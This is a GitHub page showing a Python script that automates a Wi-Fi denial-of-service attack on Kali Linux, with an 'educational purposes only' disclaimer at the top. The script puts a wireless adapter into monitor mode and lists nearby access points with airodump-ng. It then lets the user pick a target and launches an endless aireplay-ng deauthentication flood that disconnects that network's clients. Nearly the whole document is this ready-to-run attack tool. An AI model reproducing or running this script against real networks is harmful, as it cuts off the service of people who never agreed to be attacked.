forked from davidbombal/red-python-scripts
-
Notifications
You must be signed in to change notification settings - Fork 0
/
wifi_dos3.py
200 lines (174 loc) · 9.56 KB
/
wifi_dos3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
#!/usr/bin/env python3
# Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test.
# We will be using the subprocess module to run commands on Kali Linux.
import subprocess
# We require regular expressions.
import re
# We want to open the CSV files generated by airmon-ng,
# and we'll use the built-in csv module.
import csv
# We want to import os because we want to check for sudo
import os
# We want to use time.sleep()
import time
# We want to move .csv files in the folder if we found any.
# We'll use shutil for that.
import shutil
# Create a timestamp for .csv filename
from datetime import datetime
# Create an empty list
active_wireless_networks = []
# We use this function to test if the ESSID is already in the list file.
# If so we return False so we don't add it again.
# If it is not in the lst we return True which will instruct the elif
# statement to add it to the lst.
def check_for_essid(essid, lst):
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# If the user doesn't run the program with super user privileges, don't allow them to continue.
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
# Remove .csv files before running the script.
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder
# every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We move any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
# Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher.
wlan_pattern = re.compile("^wlan[0-9]+")
# Python allows is to run system commands by using a function provided by the subprocess module.
# subprocess.run(<list of command line arguments goes here>)
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
# We run the iwconfig command to look for wireless interfaces.
check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
# No WiFi Adapter connected.
if len(check_wifi_result) == 0:
print("Please connect a WiFi adapter and try again.")
exit()
# Menu to select WiFi interface from
print("The following WiFi interfaces are available:")
for index, item in enumerate(check_wifi_result):
print(f"{index} - {item}")
# Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from.
while True:
wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
try:
if check_wifi_result[int(wifi_interface_choice)]:
break
except:
print("Please enter a number that corresponds with the choices available.")
# For easy reference we call the selected interface hacknic
hacknic = check_wifi_result[int(wifi_interface_choice)]
# Tell the user we're going to kill the conflicting processes.
print("WiFi adapter connected!\nNow let's kill conflicting processes:")
# Put wireless in Monitor mode
print("Putting Wifi adapter into monitored mode:")
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", hacknic, "down"])
# Killing additional processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", hacknic, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", hacknic, "up"])
# subprocess.Popen(<list of command line arguments goes here>)
# The Popen method opens a pipe from a command.
# The output is an open file that can be accessed by other programs.
# We run the iwconfig command to look for wireless interfaces.
# Discover access points
discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
# Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# This will run multiple times and we need to reset the cursor to the beginning of the file.
csv_h.seek(0)
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
# We want to exclude the row with BSSID.
if row["BSSID"] == "BSSID":
pass
# We are not interested in the client data.
elif row["BSSID"] == "Station MAC":
break
# Every field where an ESSID is specified will be added to the list.
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
# If you don't make a choice from the options available in the list,
# you will be asked to please try again.
choice = input("Please select a choice from above: ")
try:
if active_wireless_networks[int(choice)]:
break
except:
print("Please try again.")
# To make it easier to work with and read the code, we assign the results to variables.
hackbssid = active_wireless_networks[int(choice)]["BSSID"]
hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
# Change to the channel we want to perform the DOS attack on.
# Monitoring takes place on a different channel and we need to set it to that channel.
subprocess.run(["airmon-ng", "start", hacknic, hackchannel])
# Deauthenticate clients using a subprocess.
# The script is the parent process and creates a child process which runs the system command,
# and will only continue once the child process has completed.
try:
subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, hacknic])
except KeyboardInterrupt:
print("Done!")
# User will need to use control-c to break the script.